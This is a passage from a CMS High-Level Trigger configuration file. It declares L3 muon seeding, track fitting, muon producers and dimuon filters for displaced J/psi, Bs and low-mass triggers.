'skipTSG',\n 'iterativeTSG' ),\n L3TkCollectionA = cms.InputTag( \"hltL3TkFromL2OICombination\" ),\n iterativeTSG = cms.PSet( \n firstTSG = cms.PSet( \n ComponentName = cms.string( \"TSGFromOrderedHits\" ),\n OrderedHitsFactoryPSet = cms.PSet( \n ComponentName = cms.string( \"StandardHitTripletGenerator\" ),\n GeneratorPSet = cms.PSet( \n useBending = cms.bool( True ),\n useFixedPreFiltering = cms.bool( False ),\n maxElement = cms.uint32( 0 ),\n phiPreFiltering = cms.double( 0.3 ),\n extraHitRPhitolerance = cms.double( 0.06 ),\n useMultScattering = cms.bool( True ),\n ComponentName = cms.string( \"PixelTripletHLTGenerator\" ),\n extraHitRZtolerance = cms.double( 0.06 ),\n SeedComparitorPSet = cms.PSet( ComponentName = cms.string( \"none\" ) )\n ),\n SeedingLayers = cms.string( \"hltESPPixelLayerTriplets\" )\n ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" )\n ),\n PSetNames = cms.vstring( 'firstTSG',\n 'secondTSG' ),\n ComponentName = cms.string( \"CombinedTSG\" ),\n thirdTSG = cms.PSet( \n PSetNames = cms.vstring( 'endcapTSG',\n 'barrelTSG' ),\n barrelTSG = cms.PSet( ),\n endcapTSG = cms.PSet( \n ComponentName = cms.string( \"TSGFromOrderedHits\" ),\n OrderedHitsFactoryPSet = cms.PSet( \n maxElement = cms.uint32( 0 ),\n ComponentName = cms.string( \"StandardHitPairGenerator\" ),\n SeedingLayers = cms.string( \"hltESPMixedLayerPairs\" ),\n useOnDemandTracker = cms.untracked.int32( 0 )\n ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" )\n ),\n etaSeparation = cms.double( 2.0 ),\n ComponentName = cms.string( \"DualByEtaTSG\" )\n ),\n secondTSG = cms.PSet( \n ComponentName = cms.string( \"TSGFromOrderedHits\" ),\n OrderedHitsFactoryPSet = cms.PSet( \n maxElement = cms.uint32( 0 ),\n ComponentName = cms.string( \"StandardHitPairGenerator\" ),\n SeedingLayers = cms.string( \"hltESPPixelLayerPairs\" ),\n useOnDemandTracker = cms.untracked.int32( 0 )\n ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" )\n )\n ),\n skipTSG = cms.PSet( ),\n ComponentName = cms.string( \"DualByL2TSG\" )\n ),\n TrackerSeedCleaner = cms.PSet( \n cleanerFromSharedHits = cms.bool( True ),\n ptCleaner = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n directionCleaner = cms.bool( True )\n ),\n TSGFromMixedPairs = cms.PSet( ),\n TSGFromPixelTriplets = cms.PSet( ),\n TSGFromPixelPairs = cms.PSet( ),\n TSGForRoadSearchOI = cms.PSet( ),\n TSGForRoadSearchIOpxl = cms.PSet( ),\n TSGFromPropagation = cms.PSet( ),\n TSGFromCombinedHits = cms.PSet( )\n)\nhltL3TrackCandidateFromL2IOHit = cms.EDProducer( \"CkfTrajectoryMaker\",\n trackCandidateAlso = cms.bool( True ),\n src = cms.InputTag( \"hltL3TrajSeedIOHit\" ),\n TrajectoryBuilder = cms.string( \"hltESPMuonCkfTrajectoryBuilder\" ),\n TrajectoryCleaner = cms.string( \"hltESPTrajectoryCleanerBySharedHits\" ),\n NavigationSchool = cms.string( \"SimpleNavigationSchool\" ),\n RedundantSeedCleaner = cms.string( \"CachingSeedCleanerBySharedInput\" ),\n useHitsSplitting = cms.bool( False ),\n TransientInitialStateEstimatorParameters = cms.PSet( \n propagatorAlongTISE = cms.string( \"PropagatorWithMaterial\" ),\n numberMeasurementsForFit = cms.int32( 4 ),\n propagatorOppositeTISE = cms.string( \"PropagatorWithMaterialOpposite\" )\n ),\n doSeedingRegionRebuilding = cms.bool( False ),\n cleanTrajectoryAfterInOut = cms.bool( False ),\n maxNSeeds = cms.uint32( 100000 )\n)\nhltL3TkTracksFromL2IOHit = cms.EDProducer( \"TrackProducer\",\n TrajectoryInEvent = cms.bool( True ),\n useHitsSplitting = cms.bool( False ),\n clusterRemovalInfo = cms.InputTag( \"\" ),\n alias = cms.untracked.string( \"\" ),\n Fitter = cms.string( \"hltESPKFFittingSmoother\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n src = cms.InputTag( \"hltL3TrackCandidateFromL2IOHit\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n AlgorithmName = cms.string( \"undefAlgorithm\" ),\n NavigationSchool = cms.string( \"\" )\n)\nhltL3MuonsIOHit = cms.EDProducer( \"L3MuonProducer\",\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n L3TrajBuilderParameters = cms.PSet( \n ScaleTECyFactor = cms.double( -1.0 ),\n GlbRefitterParameters = cms.PSet( \n TrackerSkipSection = cms.int32( -1 ),\n DoPredictionsOnly = cms.bool( False ),\n PropDirForCosmics = cms.bool( False ),\n HitThreshold = cms.int32( 1 ),\n MuonHitsOption = cms.int32( 1 ),\n Chi2CutRPC = cms.double( 1.0 ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n DTRecSegmentLabel = cms.InputTag( \"hltDt4DSegments\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n CSCRecSegmentLabel = cms.InputTag( \"hltCscSegments\" ),\n Chi2CutCSC = cms.double( 150.0 ),\n Chi2CutDT = cms.double( 10.0 ),\n RefitRPCHits = cms.bool( True ),\n SkipStation = cms.int32( -1 ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" ),\n TrackerSkipSystem = cms.int32( -1 )\n ),\n ScaleTECxFactor = cms.double( -1.0 ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n MuonTrackingRegionBuilder = cms.PSet( \n EtaR_UpperLimit_Par1 = cms.double( 0.25 ),\n EtaR_UpperLimit_Par2 = cms.double( 0.15 ),\n OnDemand = cms.double( -1.0 ),\n Rescale_Dz = cms.double( 3.0 ),\n vertexCollection = cms.InputTag( \"pixelVertices\" ),\n Rescale_phi = cms.double( 3.0 ),\n Eta_fixed = cms.double( 0.2 ),\n DeltaZ_Region = cms.double( 15.9 ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n PhiR_UpperLimit_Par2 = cms.double( 0.2 ),\n Eta_min = cms.double( 0.05 ),\n Phi_fixed = cms.double( 0.2 ),\n DeltaR = cms.double( 0.2 ),\n EscapePt = cms.double( 1.5 ),\n UseFixedRegion = cms.bool( False ),\n PhiR_UpperLimit_Par1 = cms.double( 0.6 ),\n Rescale_eta = cms.double( 3.0 ),\n Phi_min = cms.double( 0.05 ),\n UseVertex = cms.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" )\n ),\n RefitRPCHits = cms.bool( True ),\n PCut = cms.double( 2.5 ),\n TrackTransformer = cms.PSet( \n DoPredictionsOnly = cms.bool( False ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n RefitRPCHits = cms.bool( True ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" )\n ),\n GlobalMuonTrackMatcher = cms.PSet( \n Pt_threshold1 = cms.double( 0.0 ),\n DeltaDCut_3 = cms.double( 15.0 ),\n MinP = cms.double( 2.5 ),\n MinPt = cms.double( 1.0 ),\n Chi2Cut_1 = cms.double( 50.0 ),\n Pt_threshold2 = cms.double( 9.99999999E8 ),\n LocChi2Cut = cms.double( 0.0010 ),\n Eta_threshold = cms.double( 1.2 ),\n Quality_3 = cms.double( 7.0 ),\n Quality_2 = cms.double( 15.0 ),\n Chi2Cut_2 = cms.double( 50.0 ),\n Chi2Cut_3 = cms.double( 200.0 ),\n DeltaDCut_1 = cms.double( 40.0 ),\n DeltaRCut_2 = cms.double( 0.2 ),\n DeltaRCut_3 = cms.double( 1.0 ),\n DeltaDCut_2 = cms.double( 10.0 ),\n DeltaRCut_1 = cms.double( 0.1 ),\n Propagator = cms.string( \"hltESPSmartPropagator\" ),\n Quality_1 = cms.double( 20.0 )\n ),\n PtCut = cms.double( 1.0 ),\n TrackerPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n tkTrajLabel = cms.InputTag( \"hltL3TkTracksFromL2IOHit\" )\n ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'hltESPSmartPropagatorAny',\n 'SteppingHelixPropagatorAny',\n 'hltESPSmartPropagator',\n 'hltESPSteppingHelixPropagatorOpposite' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n TrackLoaderParameters = cms.PSet( \n PutTkTrackIntoEvent = cms.untracked.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n SmoothTkTrack = cms.untracked.bool( False ),\n MuonSeededTracksInstance = cms.untracked.string( \"L2Seeded\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonUpdatorAtVertexParameters = cms.PSet( \n MaxChi2 = cms.double( 1000000.0 ),\n Propagator = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n BeamSpotPositionErrors = cms.vdouble( 0.1, 0.1, 5.3 )\n ),\n VertexConstraint = cms.bool( False ),\n DoSmoothing = cms.bool( True )\n )\n)\nhltL3TrajectorySeed = cms.EDProducer( \"L3MuonTrajectorySeedCombiner\",\n labels = cms.VInputTag( 'hltL3TrajSeedIOHit','hltL3TrajSeedOIState','hltL3TrajSeedOIHit' )\n)\nhltL3TrackCandidateFromL2 = cms.EDProducer( \"L3TrackCandCombiner\",\n labels = cms.VInputTag( 'hltL3TrackCandidateFromL2IOHit','hltL3TrackCandidateFromL2OIHit','hltL3TrackCandidateFromL2OIState' )\n)\nhltL3TkTracksFromL2 = cms.EDProducer( \"L3TrackCombiner\",\n labels = cms.VInputTag( 'hltL3TkTracksFromL2IOHit','hltL3TkTracksFromL2OIHit','hltL3TkTracksFromL2OIState' )\n)\nhltL3MuonsLinksCombination = cms.EDProducer( \"L3TrackLinksCombiner\",\n labels = cms.VInputTag( 'hltL3MuonsOIState','hltL3MuonsOIHit','hltL3MuonsIOHit' )\n)\nhltL3Muons = cms.EDProducer( \"L3TrackCombiner\",\n labels = cms.VInputTag( 'hltL3MuonsOIState','hltL3MuonsOIHit','hltL3MuonsIOHit' )\n)\nhltL3MuonCandidates = cms.EDProducer( \"L3MuonCandidateProducer\",\n InputObjects = cms.InputTag( \"hltL3Muons\" ),\n InputLinksObjects = cms.InputTag( \"hltL3MuonsLinksCombination\" ),\n MuonPtOption = cms.string( \"Tracker\" )\n)\nhltDoubleMu4JpsiDisplacedL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.2 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 4.0 ),\n MinInvMass = cms.double( 2.9 ),\n MaxInvMass = cms.double( 3.3 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerDoubleMu4Jpsi = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu4JpsiDisplacedL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltDisplacedmumuFilterDoubleMu4Jpsi = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 3.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.15 ),\n MinCosinePointingAngle = cms.double( 0.9 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDoubleMu4Jpsi\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltBoolEnd = cms.EDFilter( \"HLTBool\",\n result = cms.bool( True )\n)\nhltPreDoubleMu5JpsiDisplaced = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDoubleMu5JpsiDisplacedL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.2 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 5.0 ),\n MinInvMass = cms.double( 2.9 ),\n MaxInvMass = cms.double( 3.3 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerDoubleMu5Jpsi = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu5JpsiDisplacedL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltDisplacedmumuFilterDoubleMu5Jpsi = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 3.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.15 ),\n MinCosinePointingAngle = cms.double( 0.9 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDoubleMu5Jpsi\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDoubleMu4Dimuon4BsBarrel = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDoubleMu4BarrelBsL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 1.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 3.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 4.0 ),\n MinInvMass = cms.double( 4.8 ),\n MaxInvMass = cms.double( 6.0 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerBs4 = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu4BarrelBsL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterBs4 = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerBs4\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDoubleMu4Dimuon6Bs = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDoubleMu4Dimuon6BsL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 5.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 4.0 ),\n MinInvMass = cms.double( 4.8 ),\n MaxInvMass = cms.double( 6.0 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerBs6 = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu4Dimuon6BsL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterBs6 = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerBs6\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDoubleMu4p5LowMassDisplaced = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDoubleMu4p5LowMassDisplacedL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.2 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 4.5 ),\n MinInvMass = cms.double( 1.0 ),\n MaxInvMass = cms.double( 4.8 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerDoubleMu4p5LowMass = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu4p5LowMassDisplacedL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltDisplacedmumuFilterDoubleMu4p5LowMass = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 3.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.15 ),\n MinCosinePointingAngle = cms.double( 0.9 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDoubleMu4p5LowMass\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDoubleMu5LowMassDisplaced = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDoubleMu5LowMassDisplacedL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.2 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 5.0 ),\n MinInvMass = cms.double( 1.0 ),\n MaxInvMass = cms.double( 4.8 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerDoubleMu5LowMass = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu5LowMassDisplacedL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltDisplacedmumuFilterDoubleMu5LowMass = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 3.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.15 ),\n MinCosinePointingAngle = cms.double( 0.9 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDoubleMu5LowMass\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon0Jpsi = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltJpsiL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 0.0 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 2.8 ),\n MaxInvMass = cms.double( 3.35 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerJpsi0 = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltJpsiL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterJpsi = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerJpsi0\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon0JpsiNoVertexing = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltJpsiNoVertexingL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 0.0 ),\n MinPtMax = cms.double( 0.0 